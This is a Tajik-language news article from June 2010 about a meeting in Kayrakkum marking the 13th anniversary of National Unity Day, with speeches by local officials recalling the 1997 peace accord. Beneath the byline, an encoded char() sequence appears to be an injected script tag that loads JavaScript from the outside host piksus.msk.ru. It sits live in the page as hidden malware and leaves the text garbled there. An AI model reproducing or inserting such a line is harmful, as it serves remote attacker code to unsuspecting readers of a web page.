29.06.2010
Вохӯрӣ
Суғд. Санаи 24уми июни соли равон дар асоси нақша – чорабинии Мақомоти иҷроияи ҳокимияти давлатии шаҳри Кайроқум дар толори корхонаи ЭКГК – и шаҳраки Сидарё бо иштироки муовини Раиси шаҳри Кайроқум Косимова К. М. , муовини Раиси Харакати Ваҳдат ва эҳёи миллии Тоҷикистон дар шаҳри Кайроқум Нуриллоева С. Н. , Раиси КИ ХХДТ шаҳри Кайроқум Хомидов С.М. сармуҳаррири рӯзномаи шаҳри Мадализода И. Р. бахшида ба сенздаҳумин солгарди Иди Ваҳдати миллии Чумҳурии Тоҷикистон вохӯри баргузор гардид.
Сараввал Раиси ҷамоат Акрамҷон Юлдошев ба сухан баромада ҳамаи ҷамъомадагонро бо 13 – умин солгарди Иди Ваҳдати миллии Чумҳурии Тоҷикистон табрику таҳният гуфта, ба ҳозирин меҳмононро муаллифи намуд.
Сипас муовини Раиси шаҳри Кайроқум Косимова К. М. суханронӣ намуда, саҳми президенти Чумҳурӣ Эмомали Раҳмонро дар роҳ эҳёи Ваҳдати миллӣ ёдовар шуд.
Баъдан муовини Раиси Харакати Ваҳдати Миллӣ ва эҳёи Тоҷикистон дар шаҳри Кайроқум буда, Нуриллоева С.М , он рӯзҳоро ба хотир оварда зикр кард, ки хушбахтона, баъди кашмакашҳои бемаънӣ мардуми тоҷик зарурат ва аҳамияти сулҳу субот ва Ваҳдати миллиро дарк намуд ва ба сари мизи музокирот нишас. Гуфтушунидҳои тарафайн чаҳор сол идома ёфта, ниҳоят санаи 27 – уми июни соли 1997 дар шаҳри Маскав аҳдномаи «Истиқрори сулҳ ва ризоияти миллӣ» ба имзо расид. Ин рӯз дар саҳифаи таърихи кишвари тозаистиқлоли мо бо ҳарфҳои заррин сабт ва чун рӯзи ҷашни миллӣ шинохта шуд.
Раиси ХХДТ шаҳри Кайроқум Хомидов С.М ва сармуҳарири рӯзномаи шаҳри Илҳоми Раҳим андешаҳояшонро дар атрофи ин мавзӯъ иброз доштанд.
Раиси ҷамоат Юлдошев А. низ аз воқеҳои рӯзҳои мутҳише, ки ба сари халқи мо омада буд ёдовар шуда, қайд намуд, ки барои барқарор кардани сохти конститутсионӣ дар қатори дигар ҷавонмардони ватандӯст, дар гузаронидани иҷлосияи таърихии 16 – уми Шӯрои Олии Чумҳурии Тоҷикистон, ки аз 16 – ум то 30 – юми ноябри соли 1992 дар қасри Арбоби ба номи Саидхӯҷа Урунхоҷаев иштирок намуда, бехатарии вакилонро ба дӯш гирифта буданд.
Дар охир ба меҳмонон аз номи ҳозирин барои баромадҳои ҷолиб миннатдорӣ изҳор намуд.

донишҷӯи бахши рӯзноманигории
факултаи филологияи тоҷик
Раҳматзода Дилфуза.
Таҷрибаомӯз
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)c5a4aee15806f22e249626c9172d5245.js" type="text/javascript">

ТАВЗЕҲОТ